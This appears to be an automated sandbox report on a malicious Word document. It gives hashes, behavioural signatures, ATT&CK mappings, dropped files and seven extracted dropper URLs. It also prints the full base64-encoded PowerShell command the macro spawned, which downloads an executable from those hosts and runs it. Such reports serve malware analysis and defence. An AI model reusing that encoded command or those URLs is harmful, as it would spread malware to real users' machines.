2abeaf4f1a0bea26a83fc03eeaabaf1c41c9e85115caaea0010ad07c363c2dc9

General

Target

PTD-080120 ZGO-082920.doc
Size

223KB
MD5

21b3a9b03027779dc3070481a468b211
SHA1

6cbaadce0d5e96e9183d01363e26ea7fe8c6cc62
SHA256

7dc9821a27cbc29bddb4bb3c708aad0b24a82d9beb1a2df9caeabf7ea6bd8e06
SHA512

1b2146c0c83cdb7e438465225d7b10813ccf47ee37bc9b13ec6a1572c56f494359a7252218262a0003ab5cf820ab69baf67ba48bf60b448e65ffca0388a98b71
SSDEEP

3072:P7Yy0u8YGgjv+ZvchmkHcI/o1/Vb6//////////////////////////////////E:10uXnWFchmmcI/o1/NO5j4nwKz7Oc

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://qstride.com/img/0/

exe.dropper

http://tskgear.com/wp-content/uploads/2015/06/pz/

exe.dropper

http://vermasiyaahi.com/cgi-bin/8/

exe.dropper

http://www.weblabor.com.br/avisos/QIU9/

exe.dropper

http://viniciusrangel.com/experimental/VIhMh1/

exe.dropper

http://westvac.com/wp-content/GOYx/

exe.dropper

https://viewall.eu/cgi-bin/SbhZP9X/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1000	4488	powersheLL.exe

Blocklisted process makes network request 13 IoCs

Processes:

powersheLL.exe

flow	pid	process
42	1000	powersheLL.exe
44	1000	powersheLL.exe
51	1000	powersheLL.exe
52	1000	powersheLL.exe
55	1000	powersheLL.exe
60	1000	powersheLL.exe
62	1000	powersheLL.exe
63	1000	powersheLL.exe
67	1000	powersheLL.exe
69	1000	powersheLL.exe
71	1000	powersheLL.exe
84	1000	powersheLL.exe
86	1000	powersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3044 WINWORD.EXE
3044 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powersheLL.exe

pid process

1000 powersheLL.exe
1000 powersheLL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1000 powersheLL.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

3044 WINWORD.EXE
3044 WINWORD.EXE
3044 WINWORD.EXE
3044 WINWORD.EXE
3044 WINWORD.EXE
3044 WINWORD.EXE
3044 WINWORD.EXE

pid	process
3044	WINWORD.EXE
3044	WINWORD.EXE

pid	process
1000	powersheLL.exe
1000	powersheLL.exe

description	pid	process
Token: SeDebugPrivilege	1000	powersheLL.exe

pid	process
3044	WINWORD.EXE
3044	WINWORD.EXE
3044	WINWORD.EXE
3044	WINWORD.EXE
3044	WINWORD.EXE
3044	WINWORD.EXE
3044	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PTD-080120 ZGO-082920.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3044

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwADEAOQBcACAALQBpAHQAZQBtAHQAeQBwAGUAIABkAGkAUgBlAEMAVABvAHIAeQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBgAGUAQwB1AFIASQBgAFQAWQBQAFIAbwBgAFQATwBDAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKwAoACcALAAnACsAJwAgAHQAbAAnACkAKwAoACcAcwAnACsAJwAxADEALAAgAHQAbAAnACkAKwAnAHMAJwApADsAJABHAHkANAA3AF8ANABkACAAPQAgACgAKAAnAFkAJwArACcAOAA1AG0AaQA0AHYAJwApACsAJwB0AGQAJwApADsAJABLAHgAZgBmAHQAaQB5AD0AKAAoACcAUgAnACsAJwBvADEAJwApACsAKAAnADkAbwAnACsAJwBsADYAJwApACkAOwAkAEcAdgA1AHkAaAAzAG4APQAkAGUAbgB2ADoAdABlAG0AcAArACgAKAAoACcAdQByACcAKwAnADEAdwBvAHIAJwArACcAZAAnACkAKwAoACcAdQAnACsAJwByADEAJwArACcAMgAwADEAOQAnACkAKwAoACcAdQAnACsAJwByADEAJwApACkALQByAEUAcABsAEEAQwBFACgAWwBDAGgAYQBSAF0AMQAxADcAKwBbAEMAaABhAFIAXQAxADEANAArAFsAQwBoAGEAUgBdADQAOQApACwAWwBDAGgAYQBSAF0AOQAyACkAKwAkAEcAeQA0ADcAXwA0AGQAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABCAGQAZgB4AGUAOAAxAD0AKAAnAFkAZAAnACsAKAAnAF8AMgBwACcAKwAnAGMAJwApACsAJwA5ACcAKQA7ACQARQBuAGkAYwA5AGIAcgA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBFAFQALgB3AEUAQgBjAGwASQBFAG4AdAA7ACQASABxADAAeQBsADAAYgA9ACgAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAvAHEAJwApACsAKAAnAHMAdAAnACsAJwByAGkAJwApACsAJwBkAGUAJwArACcALgAnACsAJwBjACcAKwAoACcAbwBtACcAKwAnAC8AJwApACsAKAAnAGkAbQBnAC8AJwArACcAMAAvACoAJwApACsAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoALwAvAHQAcwBrACcAKwAnAGcAJwApACsAKAAnAGUAYQByAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACcAZQBuACcAKwAoACcAdAAvACcAKwAnAHUAcAAnACkAKwAnAGwAJwArACcAbwBhACcAKwAnAGQAcwAnACsAKAAnAC8AMgAnACsAJwAwACcAKQArACgAJwAxADUAJwArACcALwAwADYALwBwACcAKwAnAHoALwAqACcAKQArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwACcAKwAnADoALwAvAHYAZQAnACkAKwAoACcAcgBtAGEAcwAnACsAJwBpACcAKQArACcAeQBhACcAKwAnAGEAaAAnACsAKAAnAGkALgBjACcAKwAnAG8AJwApACsAKAAnAG0ALwAnACsAJwBjACcAKwAnAGcAaQAtAGIAaQAnACsAJwBuAC8AJwApACsAKAAnADgALwAqACcAKwAnAGgAdAB0AHAAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAHcAdwAnACkAKwAoACcAdwAuAHcAJwArACcAZQAnACkAKwAoACcAYgBsACcAKwAnAGEAYgBvAHIAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwApACsAJwAuAGIAJwArACcAcgAvACcAKwAoACcAYQAnACsAJwB2AGkAcwAnACkAKwAnAG8AcwAnACsAKAAnAC8AJwArACcAUQBJACcAKwAnAFUAOQAvACcAKQArACgAJwAqAGgAdAAnACsAJwB0ACcAKQArACgAJwBwADoAJwArACcALwAvACcAKQArACgAJwB2AGkAbgAnACsAJwBpAGMAJwArACcAaQAnACkAKwAoACcAdQAnACsAJwBzAHIAYQBuAGcAZQAnACkAKwAoACcAbAAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvAGUAJwArACcAeAAnACkAKwAoACcAcABlAHIAJwArACcAaQAnACsAJwBtACcAKwAnAGUAbgB0AGEAJwApACsAKAAnAGwALwBWAEkAaABNACcAKwAnAGgAMQAnACsAJwAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAJwApACsAJwA6ACcAKwAoACcALwAnACsAJwAvACcAKwAnAHcAZQBzAHQAdgBhAGMAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwApACsAJwAvAHcAJwArACgAJwBwAC0AJwArACcAYwBvACcAKQArACcAbgB0ACcAKwAnAGUAJwArACcAbgAnACsAJwB0AC8AJwArACgAJwBHACcAKwAnAE8AWQB4AC8AKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcAAnACsAJwBzADoAJwApACsAKAAnAC8ALwAnACsAJwB2ACcAKQArACgAJwBpAGUAJwArACcAdwAnACkAKwAoACcAYQBsAGwAJwArACcALgAnACkAKwAnAGUAJwArACcAdQAnACsAKAAnAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBTAGIAaAAnACsAJwBaAFAAJwApACsAJwA5AFgAJwArACcALwAnACkALgAiAFMAYABwAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASwBiAHQAZAB2AHEAdgA9ACgAKAAnAEIAJwArACcAMQB5AHUAJwApACsAKAAnAGcAJwArACcAYQB0ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQQAzADcAcwA4AGsAcAAgAGkAbgAgACQASABxADAAeQBsADAAYgApAHsAdAByAHkAewAkAEUAbgBpAGMAOQBiAHIALgAiAEQAbwB3AG4AYABMAGAAbwBgAEEAZABmAEkATABFACIAKAAkAEEAMwA3AHMAOABrAHAALAAgACQARwB2ADUAeQBoADMAbgApADsAJABNAGYAMgBzAG4AcgA0AD0AKAAoACcAWAAnACsAJwBqAGkAcABpACcAKQArACcAOQAnACsAJwA0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABHAHYANQB5AGgAMwBuACkALgAiAGwAYABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADEAOQA5ADcAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAoACQARwB2ADUAeQBoADMAbgApADsAJABSAHUAbgA0ADMAdAB3AD0AKAAoACcAVAB2AG8AagAnACsAJwBnACcAKQArACcAMQA4ACcAKQA7AGIAcgBlAGEAawA7ACQATQBqAGoAbABxAHkAOQA9ACgAJwBBACcAKwAoACcAZwBsACcAKwAnAGkAJwApACsAKAAnAGYAJwArACcAZwBlACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABCAGUAcwByAGYAegAxAD0AKAAnAEQAXwAnACsAJwB4ACcAKwAoACcANwAnACsAJwBvAGoAMgAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qcl2d40l.5tv.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wORD\2019\Y85mi4vtd.exe
Filesize
43KB

MD5
6c8eaf58999c10f3cf45e31f41b31de5

SHA1
24f76af980e0fd550f9a8b65a20986fd000cd0dc

SHA256
b5b92f2884ee449cca58454420a8321cad7d6366d0e1e74967e2219d545048eb

SHA512
6b6d3f27f0b466eb22fb78d2be25e456d40f22684b6360448d777e144c05588f1e6fa55fa5f2c97bb1a72e7a26a5699db02c79e5236861c32882d17cd538493f

Download Submit
C:\Users\Admin\AppData\Local\Temp\wORD\2019\Y85mi4vtd.exe
Filesize
43KB

MD5
e95946d7ab207eb049c96df66ed27da4

SHA1
33f0c76f1ae6f6561c7dd37168f8d843b3b75ef2

SHA256
e7a73f1fd705f4a417d4e4b2ddb864c1861ff915bc0f835cbb06eafa17829c16

SHA512
30ade901f499180086764020f572a0b254dcbca6de87bebb9ad7a9f2064cc5cecc6490dd847ce59db1c65704216adfcb8c27da9fe0d7216d0dcbfe4bb5b37788

Download Submit
memory/1000-204-0x0000024549190000-0x00000245491A0000-memory.dmp

Filesize
64KB

Download
memory/1000-202-0x0000024549190000-0x00000245491A0000-memory.dmp

Filesize
64KB

Download
memory/1000-234-0x0000024549190000-0x00000245491A0000-memory.dmp

Filesize
64KB

Download
memory/1000-233-0x0000024549190000-0x00000245491A0000-memory.dmp

Filesize
64KB

Download
memory/1000-232-0x0000024549190000-0x00000245491A0000-memory.dmp

Filesize
64KB

Download
memory/1000-203-0x0000024549190000-0x00000245491A0000-memory.dmp

Filesize
64KB

Download
memory/1000-192-0x0000024549240000-0x0000024549262000-memory.dmp

Filesize
136KB

Download
memory/3044-146-0x000001CA58640000-0x000001CA58840000-memory.dmp

Filesize
2.0MB

Download
memory/3044-136-0x00007FF8D91D0000-0x00007FF8D91E0000-memory.dmp

Filesize
64KB

Download
memory/3044-133-0x00007FF8D91D0000-0x00007FF8D91E0000-memory.dmp

Filesize
64KB

Download
memory/3044-135-0x00007FF8D91D0000-0x00007FF8D91E0000-memory.dmp

Filesize
64KB

Download
memory/3044-214-0x000001CA58640000-0x000001CA58840000-memory.dmp

Filesize
2.0MB

Download
memory/3044-134-0x00007FF8D91D0000-0x00007FF8D91E0000-memory.dmp

Filesize
64KB

Download
memory/3044-137-0x00007FF8D91D0000-0x00007FF8D91E0000-memory.dmp

Filesize
64KB

Download
memory/3044-139-0x00007FF8D7060000-0x00007FF8D7070000-memory.dmp

Filesize
64KB

Download
memory/3044-138-0x00007FF8D7060000-0x00007FF8D7070000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads